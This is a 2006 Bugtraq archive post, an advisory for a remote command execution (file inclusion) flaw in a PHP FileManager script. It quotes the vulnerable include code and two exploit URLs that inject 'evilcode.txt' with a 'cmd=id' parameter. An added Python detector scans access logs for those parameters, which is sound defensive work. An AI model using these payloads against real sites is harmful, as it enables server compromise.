Bugtraq mailing list archives

[Kurdish Security # 19 ] FileManager Remote Command Execution


From: botan () linuxmail org
Date: 1 Aug 2006 14:04:03 -0000

Kurdish Security 

FileManager Remote Command Execution 

Freedom For Ocalan

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

Risk : High

Class : Remote 

Script : FileManager 

Site : http://www.knusperleicht.at

Code : 

<?php
$dwl_download_path = "downloads";
$dwl_include_path = "dwl/";
include($dwl_include_path."index.php");
?>

http://site.com/[path]/dwl_download_path=evilcode.txt?&cmd=id

http://site.com/[path]/dwl_include_path=evilcode.txt?&cmd=id
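
A defender-side check for the request pattern shown in the advisory, as an added example that is not part of the original post: it scans web-server access logs for requests that try to supply dwl_download_path or dwl_include_path. The Combined Log Format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Variable names taken from the advisory; they are configuration values and
# should never arrive as request parameters.
WATCHED = ("dwl_download_path", "dwl_include_path")

# Request line inside a Combined Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# name=value or name[]=value, wherever it sits in the target (the advisory's
# URLs put the assignment in the path, not after "?").
PARAM_RE = re.compile(
    r"(?<![A-Za-z0-9_])(?P<name>%s)(?:\[[^\]]*\])?=(?P<value>[^&?#\s]*)" % "|".join(WATCHED)
)

def decode(target, rounds=3):
    """Percent-decode repeatedly so %2564-style double encoding is caught."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan(lines):
    """Return (client_ip, name, value) for each watched assignment seen."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = decode(m.group("target"))
        for p in PARAM_RE.finditer(target):
            hits.append((line.split(" ", 1)[0], p.group("name"), p.group("value")))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2006:14:10:00 +0000] "GET /fm/index.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [01/Aug/2006:14:11:02 +0000] "GET /fm/dwl_include_path=evilcode.txt?&cmd=id HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.7 - - [01/Aug/2006:14:11:09 +0000] "GET /fm/index.php?dwl%5Fdownload%5Fpath=x.txt HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.5 - - [01/Aug/2006:14:12:30 +0000] "GET /fm/index.php?my_dwl_include_path_old=1 HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for ip, name, value in scan(SAMPLE_LOG):
        print(f"{ip} supplied {name}={value!r}")
```

Any hit is worth reviewing, because a legitimate client has no reason to send either name; the fourth sample line shows that a longer, unrelated parameter name is not flagged.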

